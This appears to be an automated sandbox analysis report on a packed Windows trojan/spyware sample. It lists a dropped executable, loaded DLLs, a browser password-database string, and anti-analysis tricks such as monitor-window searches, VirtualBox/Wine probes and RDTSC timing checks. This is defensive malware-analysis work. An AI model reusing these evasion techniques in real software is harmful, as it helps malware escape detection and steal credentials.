              Source: file.exe, 00000000.00000003.1695196371.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1693247360.0000000005BEF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1696279793.0000000005A74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1697643062.0000000005B81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1722156149.00000000055F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1693604629.0000000005B32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1693968225.0000000005C0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1704516578.0000000005A7A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1722841252.0000000000DEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1688661921.00000000058D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1693684610.0000000005C01000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1722535596.0000000000E05000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1697370945.0000000005C80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1698403476.0000000005C9F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1698080559.0000000005A7A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1705919779.0000000005BBE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1694875574.0000000005B4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1697152878.0000000005A7A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1695089299.0000000005A7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1696603439.0000000005A75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1694981586.0000000005C2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1686352837.00000000056F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1691981707.0000000005B19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1697761164.0000000005C88000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1696714952.0000000005B6D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1699721895.0000000005BA5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1693513581.0000000005A75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1695420232.0000000005B5D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1703019820.0000000005CEE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1705627346.0000000005CFA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1722423346.00000000056A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000002.1724653610.0000000000DEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1695305143.0000000005A73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1697058021.0000000005B8A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1699002147.0000000005A7A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1705777213.0000000005A75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: ZLIB complexity 0.9980101391065831
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/2@2/2
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe.logJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeMutant created: NULL
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exe, 00000000.00000003.1517655343.00000000055D8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1533482778.0000000005675000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1517260814.00000000055F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe "C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe"
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe "C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe"Jump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeSection loaded: sspicli.dllJump to behavior
              Source: file.exeStatic file information: File size 2958336 > 1048576
              Source: file.exeStatic PE information: Raw size of jmvediaj is bigger than: 0x100000 < 0x2a6e00
              Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe, 00000003.00000002.1867159031.0000000000552000.00000040.00000001.01000000.00000006.sdmp, 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe, 00000003.00000003.1733973050.0000000004B70000.00000004.00001000.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.870000.0.unpack :EW;.rsrc :W;.idata :W;jmvediaj:EW;famfwksn:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;jmvediaj:EW;famfwksn:EW;.taggant:EW;
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeUnpacked PE file: 3.2.94JSCZGRDUWCLDEBY2HC1S58YAX1.exe.550000.0.unpack :EW;.rsrc:W;.idata :W;aisygwgx:EW;pdrbgaqy:EW;.taggant:EW; vs :ER;.rsrc:W;
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x2d3a6d should be: 0x2d3c97
              Source: 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe.0.drStatic PE information: real checksum: 0x2c54ab should be: 0x2bcb13
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .rsrc
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name: jmvediaj
              Source: file.exeStatic PE information: section name: famfwksn
              Source: file.exeStatic PE information: section name: .taggant
              Source: 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe.0.drStatic PE information: section name:
              Source: 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe.0.drStatic PE information: section name: .idata
              Source: 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe.0.drStatic PE information: section name: aisygwgx
              Source: 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe.0.drStatic PE information: section name: pdrbgaqy
              Source: 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe.0.drStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E1C832 push ecx; retf 0_3_00E1C858
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D8CF4C push esp; iretd 0_3_00D8CF59
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D8548A pushfd ; retf 0_3_00D85499
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00DABE90 pushad ; ret 0_3_00DABE95
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00DEEC9D push ebx; retf 0_3_00DEECA3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00DEEC9D push ebx; retf 0_3_00DEECA3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00DFCEB3 push ebx; iretd 0_3_00DFCEB5
              Source: file.exeStatic PE information: section name: entropy: 7.977471992304813
              Source: 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe.0.drStatic PE information: section name: entropy: 7.776956795829379
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeJump to dropped file

              Boot Survival

              barindex
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CF316 second address: 8CF321 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FDE8C51D4D6h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CF321 second address: 8CF327 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CF327 second address: 8CF32B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CF32B second address: 8CF32F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CEC37 second address: 8CEC3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A47DA9 second address: A47DC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE8CE8B4CEh 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c pushad 0x0000000d popad 0x0000000e jns 00007FDE8CE8B4C6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48070 second address: A4807F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FDE8C51D4D6h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4807F second address: A48095 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDE8CE8B4C6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jnl 00007FDE8CE8B4C6h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48095 second address: A48099 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4831C second address: A48320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48320 second address: A48342 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E2h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007FDE8C51D4D6h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4848E second address: A48494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48494 second address: A4849F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4B6F5 second address: A4B763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FDE8CE8B4C6h 0x0000000a popad 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e jmp 00007FDE8CE8B4CDh 0x00000013 popad 0x00000014 popad 0x00000015 mov dword ptr [esp], eax 0x00000018 sub dword ptr [ebp+122D1C44h], edx 0x0000001e mov edi, dword ptr [ebp+122D2E7Fh] 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push eax 0x00000029 call 00007FDE8CE8B4C8h 0x0000002e pop eax 0x0000002f mov dword ptr [esp+04h], eax 0x00000033 add dword ptr [esp+04h], 0000001Dh 0x0000003b inc eax 0x0000003c push eax 0x0000003d ret 0x0000003e pop eax 0x0000003f ret 0x00000040 jng 00007FDE8CE8B4D0h 0x00000046 pushad 0x00000047 pushad 0x00000048 popad 0x00000049 mov dword ptr [ebp+122D29FFh], eax 0x0000004f popad 0x00000050 push 44AD8AD5h 0x00000055 push eax 0x00000056 push edx 0x00000057 push edi 0x00000058 pushad 0x00000059 popad 0x0000005a pop edi 0x0000005b rdtsc
